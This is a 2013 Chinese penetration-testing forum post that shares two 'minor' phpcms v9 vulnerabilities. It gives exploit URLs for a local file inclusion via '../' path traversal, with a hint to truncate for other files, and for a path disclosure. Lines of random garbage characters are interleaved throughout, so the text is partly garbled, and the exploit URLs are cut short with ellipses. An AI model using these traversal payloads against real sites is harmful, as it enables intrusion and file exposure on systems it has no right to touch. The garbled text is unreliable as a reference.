中国网络渗透测试联盟

标题: phpcms v9两个鸡肋漏洞 [打印本页]

作者: admin    时间: 2013-4-4 17:28
标题: phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
9 C* _" g, Y) N- t& o& u+ S3 Z  n+ K: }! M* V& c6 \
Exp: http://www.php0day.com/api.php?o ... efile=../../../fuck
) C% Y" D2 ^+ n3 W+ K7 p7 i8 [  G2 l6 }$ c9 T/ H2 k
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。6 o- l8 R8 ~# o% |( C) _1 K( [! d
. T- E. L* k( R8 H& `# P, X, U8 D( u# k
Exp: http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
3 Z8 }$ s8 Y; o, N$ M, J  ~  x, a- [5 [$ h2 U
#暴路径: i0 _3 ]$ a. n5 z8 N- T

. H1 c4 [# y( J, |% G1 q$ m注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
2 _; K  `! t' k
) [0 R4 v. _# H( d& P+ u$ Q6 x
2 R  K( x: D: X/ p/ @, V$ s- T) C: A3 l% X$ M
+1




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2